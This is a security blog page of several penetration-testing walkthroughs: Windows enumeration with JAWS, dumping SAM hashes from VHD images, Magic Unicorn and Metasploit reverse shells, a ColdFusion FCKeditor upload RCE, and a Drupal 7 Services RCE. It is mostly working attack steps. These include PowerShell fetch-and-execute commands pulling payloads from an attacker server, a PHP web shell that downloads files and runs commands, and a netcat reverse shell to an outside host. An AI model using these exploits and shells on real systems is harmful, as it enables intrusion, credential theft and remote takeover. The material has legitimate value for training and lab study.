VK9 Security

How to enumerate Windows using JAWS

by | May 21, 2021 | WIndows Post-Exploitation

JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so ‘should’ run on every Windows version since Windows 7.

https://github.com/411Hall/JAWS

How to

1. Download the script

  • git clone https://github.com/411Hall/JAWS.git
  • cd JAWS
  • ls

2. Start a web server

  • python3.9 -m http.server 9999

3. On the Windows computer start powershell

  • powershell
  • IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.9:9999/jaws-enum.ps1’)

4. Note this time this server is not allowing some checks due to permissions. We can bypass the execution policy by running

  • powershell -ep bypass

5. Now you can try to run the script

  • .\jaws-enum.ps1

6. You can also save the output to a file

  • .\jaws-enum.ps1 -OutputFilename result.txt

7. It can be run directly from CMD

  • powershell.exe -ExecutionPolicy bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

8. Then just read the file

  • type JAWS-Enum.txt
  • type result.txt

Mount & Extract Password Hashes From VHD Files

by | May 21, 2021 | Windows Exploitation

A VHD file contains a virtual hard disk image used by Microsoft Windows Virtual PC, a Windows virtualization program. It stores the contents of a hard disk of a virtual machine (VM), which may include disk partitions, a file system, files, and folders. VHD files may be used to install multiple operating systems on a single computer, test software programs, or run older applications.

You may come across VHD files that are not stored properly. This could be open on an exposed NFS or SMB share, or it could even be from a backup file that you exfiltrated.

Virtual Hard Disk (VHD) files are typically used to backup data stored on a hard-disk partition. As such, data on a .vhd file is very interesting to penetration testers since it may contain valuable information.

View and Extract

1. Using 7-Zip, you can view the contents of a VHD file.

  • ls
  • 7z l 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd

2. To extract the contents, you can also use 7-zip.

  • 7z x file.vhd

Mounting a VHD on Linux

To mount a VHD on Linux, you can use Guest Mount,

1. First step is to install the tool

  • sudo apt install libguestfs-tools -y

2. Create a directory that we’ll use to mount the VHD file

  • sudo mkdir /mnt/vhd
  • ls -ld /mnt/vhd

3. we’ll use guestmount to mount the directory in read-only (ro) mode, and, use the previous folder created (/mnt/vhd)

  • guestmount –add file.vhd –inspector –ro -v /mnt/vhd
  • sudo guestmount –add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd –inspector –ro -v /mnt/vhd

NOTE: This takes a while to complete, so, be patient

4. Once, the process completes, you can access the folder where it was mounted (/mnt/vhd) and see all the OS data. Note that I ran the command as sudo, so, only root can access the data

  • cd /mnt/vhd
  • sudo su –
  • cd /mnt/vhd
  • ls

5. We can try to list interesting user directories

  • cd Users
  • cd <user>
  • find Desktop Documents Downloads -ls

Extracting Local SAM Database from VHD Files

1. Once the VHD is mounted, you may be able to grab the files that make up the SAM database so you can crack it offline.

  • cd /Windows/System32/config
  • cp SAM SYSTEM /tmp

Note: You may also want to grab nts.dit if you’re on a domain controller so you can crack all of the AD hashes.

2. Go to the local directory that you copied those files into and use secretsdump to extract the hashes.

  • cd /tmp
  • impacket-secretsdump -sam SAM -system SYSTEM local

3. You can test these hashes using SMB and see if the user has any elevated access

  • smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134

 

How to use unicorn to spawn a shell

by | Apr 7, 2021 | WIndows Post-Exploitation

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed if using Metasploit methods and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system. Unicorn supports your own shellcode, cobalt strike, and Metasploit.

https://github.com/trustedsec/unicorn

How to use (Metasploit)

1. Download the tool

  • git clone https://github.com/trustedsec/unicorn.git
  • cd unicorn
  • ls

2. Run the application to see some examples

  • ./unicorn.py

3. Display help menu

  • ./unicorn.py –h

4. Generate a payload (unicorn.py payload LHOST LPORT)

  • ./unicorn.py windows/meterpreter/reverse_tcp 192.168.0.13 4444

Note: 2 files were created powershell_attack.txt & unicorn.rc

5. Now load unicorn.rc into Metasploit, which is the msf configuration to load. It will automatically start a listener

  • msfconsole -r unicorn.rc

6. Now that the listener has started, we need to also start a python web listener to transfer the payload to the remote machine

  • python3.9 -m http.server 9999

7. At the remote server run

  • powershell “iex(new-object net.webclient).downloadString(‘http://192.168.0.13:9999/powershell_attack.txt’)”

8. The web server should now show a log connection

9. Metasploit should now have a reverse connection

  • sessions -i

 

ColdFusion 8 FCKeditor CurrentFolder directory traversal / File Upload / RCE – CVE-2009-2265

by | Mar 26, 2021 | Windows Exploitation

Multiple vendor applications that utilize FCKeditor could allow a remote attacker to traverse directories on the system and upload arbitrary files. A remote attacker could exploit this vulnerability using directory traversal sequences in the CurrentFolder parameter to several connector modules to view arbitrary files or upload malicous executable files on the system.

Affected Products

  • FCKeditor FCKeditor 2.2
  • FCKeditor FCKeditor 2.0
  • FCKeditor FCKeditor 2.4.3
  • FCKeditor FCKeditor 2.3 beta
  • Fckeditor Fckeditor 2.0 FC
  • Fckeditor Fckeditor 2.0 Rc2
  • Fckeditor Fckeditor 2.0rc2
  • Fckeditor Fckeditor 2.0rc3
  • Fckeditor Fckeditor 2.6.4
  • Fckeditor Fckeditor 2.4.2
  • Fckeditor Fckeditor 2.6.3 Beta
  • Fckeditor Fckeditor 2.6.3
  • Fckeditor Fckeditor 2.6.2
  • Fckeditor Fckeditor 2.6.1
  • Fckeditor Fckeditor 2.6
  • Fckeditor Fckeditor 2.5.1
  • Fckeditor Fckeditor 2.5
  • Fckeditor Fckeditor 2.5 Beta
  • Fckeditor Fckeditor 2.4.1
  • Fckeditor Fckeditor 2.4
  • Fckeditor Fckeditor 2.3.3
  • Fckeditor Fckeditor 2.3.2
  • Fckeditor Fckeditor 2.3.1
  • Fckeditor Fckeditor 2.3
  • Fckeditor Fckeditor 2.1.1
  • Fckeditor Fckeditor 2.1
  • Fckeditor Fckeditor 2.6.4 Beta

Dependent Product

  • Adobe ColdFusion 8.0
  • Adobe ColdFusion 8.0.1
  • ClanSphere ClanSphere 2009.0
  • Debian Debian Linux 5.0

Exploitation (Metasploit)

1. First we can visit the log in page to find out what version of ColdFusion this is

Note. Here we see ColdFusion 8

2. Now, we can search for “ColdFusion 8” exploits using searchsploit

  • searchsploit coldfusion 8

3. We found an interesting one

  • ColdFusion 8.0.1 – Arbitrary File Upload / Execution (Metasploit)

4. We open Metasploit, and, search for a ColdFusion Module

  • msfconsole
  • search coldfusion
  • use exploit/windows/http/coldfusion_fckeditor

5. Now, we will see what options are available

  • show options

Note: Interesting options are RHOSTS, RPORT, LHOST, LPORT, PAYLOAD

6. We will now edit the required variables, and, run the exploit

  • set RHOST 10.10.10.11
  • set RPORT 8500
  • set LHOST 10.10.14.19
  • exploit

Note. We see the exploit executed but the file filed to upload.

7. We will send this traffic to a proxy to find out what is going on. I will use BurpSuite. I will redirect the traffic to this tool

  • set RHOST 127.0.0.1
  • set RPORT 8080

8. In BurpSuite, I edit the proxy to receive traffic on port 8080 and redirect it to 10.10.10.11:8500

  • Proxy – Options – Edit Listeners

9. Run the exploit again. In BurpSuite, we will see the request from our machine

10. Send it to Repeater, and, resent it. We get the same “Failed to upload” in Metasploit, however, based on the server response we get a 200 OK

11. The response indicates that the file has been uploaded to /userfiles/file directory, and, the filename is XXA.jsp

12. We now know that the file is getting uploaded. I will use Metasploit to start a listener (use the same payload and options as in the previous eploit) and then execute this file from the server from the web browser

  • use exploit/multi/handler
  • set payload generic/reverse_shell
  • set LHOST 10.10.14.19
  • exploit

13. Now that we have the listener started. We will execute the script from the server

  • http://10.10.10.11:8500/userfiles/file/XXA.jsp

14. Checking the listener we get the reverse shell

  • whoami

Remedy

For FCKeditor:

  • Upgrade to the latest version of FCKeditor (2.6.4.1 or later), available from the FCKeditor Web site.

For Knowledgeroot:

  • Upgrade to the latest version of Knowledgeroot (0.9.9.1 or later), available from the Knowledgeroot Web page.

For ClanSphere:

  • Upgrade to the latest version of ClanSphere (2009.0.2 or later), available from SourceForge.net: Files.

For Adobe ColdFusion:

  • Refer to APSB09-09 for patch, upgrade or suggested workaround information.

Resources

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265

https://exchange.xforce.ibmcloud.com/vulnerabilities/51569

https://www.rapid7.com/db/modules/exploit/windows/http/coldfusion_fckeditor/

Drupal 7.x Module Services – Remote Code Execution

by | Mar 15, 2021 | Windows Exploitation

Drupal has an insecure use of unserialize(). The exploitation of the vulnerability allowed for privilege escalation, SQL injection and, finally, remote code execution. (https://www.ambionics.io/blog/drupal-services-module-rce)

We will use Exploit db code to exploit this vulnerability. (https://www.exploit-db.com/exploits/41564)

Exploit

1. Determine the version of drupal. For this we can access CHANGELOG.txt from the browser, this is a drupal document

  • http://10.10.10.9/CHANGELOG.txt

Note: This is a 7.54 version.

2. We can use searchsploit to find any associated exploit

  • searchsploit drupal 7

3. We will now download that script into our /home/vry4n/Desktop directory

  • searchsploit -m php/webapps/41564.php

4. We will modify the code first, I highlighted the part we need to modify

  • vi 41564.php

5. First we will confirm that $endpoint_path exists by visiting the browser

  • http://10.10.10.9/rest_endpoint
  • 404 not found

  • http://10.10.10.9/rest
  • 200 OK (found)

6. We will edit as follows

$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'test.php',
    'data' => '<?php echo "Vry4n was here!!"; ?>'
];

7. We may need to install php-curl

  • sudo apt-get install php-curl

ERROR we get before installing php-curl

8. Execute the script

  • php 41564.php

9. The code executed successfully and it is telling us to visit http://10.10.10.9/test.php

  • http://10.10.10.9/test.php

10. We got the file created, and, executed within the remote Drupal server

11. We will now create a file that is able to upload new files and execute commands. We will include the following code to our script 41564.php

$phpCode = <<<'EOD'
<?php
    if (isset($_REQUEST['fupload'])) {
        file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.12:8888/" . $_REQUEST['fupload']));
    };
    if (isset($_REQUEST['fexec'])) {
        echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
    };
?>
EOD;

$file = [
'filename' => 'vry4n.php',
'data' => $phpCode
];
  • vi 41564.php

12. Now we run the script again to upload the new file

  • php 41564.php

13. At this point the file vry4n.php has been uploaded, we can use 2 variables fupload & fexec. We will use first fexec to test basic commands

  • http://10.10.10.9/vry4n.php?fexec=dir

14. Now that we can execute commands, we can test fupload functionality. We will upload an image. First we need to start a web server and use the same settings as we wrote in the script

  • python3.9 -m http.server 8888

15. We need to now go to the browser, use the fupload variable

  • http://10.10.10.9/vry4n.php?fupload=vk9sec.jpg
  • http:// 10.10.10.9/vk9sec.jpg

16. We can now gather information about the system, before we execute any further instruction.

  • http://10.10.10.9/vry4n.php?fexec=systeminfo

Note: We got a x64 bit system, Microsoft Windows Server 2008 R2 Datacenter, without patches

17. We will now download a x64 netcat for Windows from https://eternallybored.org/misc/netcat/

  • unzip netcat-win32-1.11.zip
  • cd netcat-1.11 && ls
  • python3.9 -m http.server 8888

18. Now start a local listener

  • nc -lvp 7777

19. From the browser use fupload variable to upload netcat & fexec to execute it

  • http://10.10.10.9/vry4n.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.12 7777

20. We see our web server 200 OK for the download of nc64.exe

21. Checking the listener, we should now see a reverse shell after execution

Remedy

Upgrade Drupal software version

Droopescan – How to use

by | Mar 15, 2021 | Tools

A plugin-based scanner that aids security researchers in identifying issues with several CMS. (https://github.com/droope/droopescan)

Supported CMS are:

  • SilverStripe
  • WordPress
  • Drupal

Partial functionality for:

  • Joomla (version enumeration and interesting URLs only)
  • Moodle (plugin & theme very limited, watch out)

How to use

1. Download the application

  • git clone https://github.com/droope/droopescan.git
  • cd droopescan
  • ls

2. Install all dependencies

  • pip3 install -r requirements.txt

3. You may also need to install dscan

  • pip3 install dscan

4. Run the application now. Display basic help

-h, –help = show this help message and exit

  • python3.9 droopescan -h

5. Show scan options

droopescan scan –help

  • python3.9 droopescan scan –help

6. Run a basic scan

  • python3.9 droopescan scan drupal -u http://192.168.0.119